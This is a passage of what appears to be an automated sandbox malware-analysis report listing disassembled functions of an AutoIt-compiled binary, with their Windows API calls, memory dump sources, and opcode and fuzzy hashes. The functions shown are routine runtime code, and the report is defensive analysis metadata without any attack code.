                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 372448540-1403004172
                                                                            • Opcode ID: d49a6405943b462f62e4948043e2546b1516b956ec3f84f7f3ebac8661d1edf3
                                                                            • Instruction ID: 438562e4b48381546d17fe1699846edbf9dc8e77df615ee1fa56ddcc6363a5c9
                                                                            • Opcode Fuzzy Hash: d49a6405943b462f62e4948043e2546b1516b956ec3f84f7f3ebac8661d1edf3
                                                                            • Instruction Fuzzy Hash: 72018476A621186BCB15FBA0D956FFFB3AD9F15340F14021DB845632C1DA205E28DBB2
                                                                            Function 002C993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                              • Part of subcall function 002CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002CB7BD
                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 002C99A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 372448540-1403004172
                                                                            • Opcode ID: 40a98b006cb3ce443d7db84a05aa947f9511cd4a892a0670328486a1302e18e7
                                                                            • Instruction ID: b119e2026f45713528f8d62a769d8a86856c2972bb03f5120bd19a870e67991d
                                                                            • Opcode Fuzzy Hash: 40a98b006cb3ce443d7db84a05aa947f9511cd4a892a0670328486a1302e18e7
                                                                            • Instruction Fuzzy Hash: C101F776A6210867CB15FBA0D916FFFB3AC9F15340F14021DB845632C1DA214E38DA72
                                                                            Function 00296D9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: __calloc_crt
                                                                            • String ID: @b3
                                                                            • API String ID: 3494438863-1740651745
                                                                            • Opcode ID: 214bfc581cb887c4bb2e7223ef3ec16608ebc7d49db41633b60ee0bad75717ff
                                                                            • Instruction ID: 8e716176842e6f8a334dc90e3743c099a4d76314a38789a56845e69df74bd5ea
                                                                            • Opcode Fuzzy Hash: 214bfc581cb887c4bb2e7223ef3ec16608ebc7d49db41633b60ee0bad75717ff
                                                                            • Instruction Fuzzy Hash: E7F062B132C2178BFF3A8F68BD957A237D9E705720F14086AF110DA294E77088D18AA0
                                                                            Function 002D54E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName_wcscmp
                                                                            • String ID: #32770
                                                                            • API String ID: 2292705959-463685578
                                                                            • Opcode ID: 9ef11753564ca9734033c3ade97c3ff6ee56e869aaad3ffd4cd78f56b5e6ccf7
                                                                            • Instruction ID: 9e72389e20a09d1b6c7b3832f7e58a367cb316249bb30288c7303d03046a68db
                                                                            • Opcode Fuzzy Hash: 9ef11753564ca9734033c3ade97c3ff6ee56e869aaad3ffd4cd78f56b5e6ccf7
                                                                            • Instruction Fuzzy Hash: 29E02B3250032917D7109A99AC45B97F7ACDB05B21F000017F804D2051DA609A1087D0
                                                                            Function 002C8892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 002C88A0
                                                                              • Part of subcall function 00293588: _doexit.LIBCMT ref: 00293592
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Message_doexit
                                                                            • String ID: AutoIt$Error allocating memory.
                                                                            • API String ID: 1993061046-4017498283
                                                                            • Opcode ID: c1e1979c8b21e60a4bbb64de0fb5e4ef461929626344a084a7d508fbf499e94b
                                                                            • Instruction ID: c0c051413f20d811e9b67518cc6bc1107aa4ee12567282838dbb54ee7d6917f3
                                                                            • Opcode Fuzzy Hash: c1e1979c8b21e60a4bbb64de0fb5e4ef461929626344a084a7d508fbf499e94b
                                                                            • Instruction Fuzzy Hash: BBD05B3139636C37D21576A56C1BFCA7A4C8B09B51F04442BFB08655C34DD689F046D5
                                                                            Function 002B0251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(?), ref: 002B0091
                                                                              • Part of subcall function 002EC6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,002B027A,?), ref: 002EC6E7
                                                                              • Part of subcall function 002EC6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 002EC6F9
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 002B0289
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                            • String ID: WIN_XPe
                                                                            • API String ID: 582185067-3257408948
                                                                            • Opcode ID: ebe0f5e7ce6a136538a6d5fd70794fc70e15d605d6f7f91e105157996e4ebcb3
                                                                            • Instruction ID: 657e9eec3c30408da0bc24b9cce26c866e88c020d3da2255d2b37f245185080c
                                                                            • Opcode Fuzzy Hash: ebe0f5e7ce6a136538a6d5fd70794fc70e15d605d6f7f91e105157996e4ebcb3
                                                                            • Instruction Fuzzy Hash: 78F03070825109DFCB16EF95C9947ED7BBCAB08340F644485E146A2050CBB04F50DF20
                                                                            Function 00285800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DestroyIcon.USER32(,z30z3,00337A2C,00337890,?,00285A53,00337A2C,00337A30,?,00000004), ref: 00285823
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: DestroyIcon
                                                                            • String ID: ,z30z3$SZ(,z30z3
                                                                            • API String ID: 1234817797-3370825192
                                                                            • Opcode ID: 9aeefa614529210131db453a03a4a6828c3bee502170891948ea732793d73adb
                                                                            • Instruction ID: 5423d569098448df658bfd9476570f13ed52925398277612a368a29f510076d5
                                                                            • Opcode Fuzzy Hash: 9aeefa614529210131db453a03a4a6828c3bee502170891948ea732793d73adb
                                                                            • Instruction Fuzzy Hash: 40E0C236025217EBE7212F08D800794FBECAF21321F248017E08056090D3B568F0CB94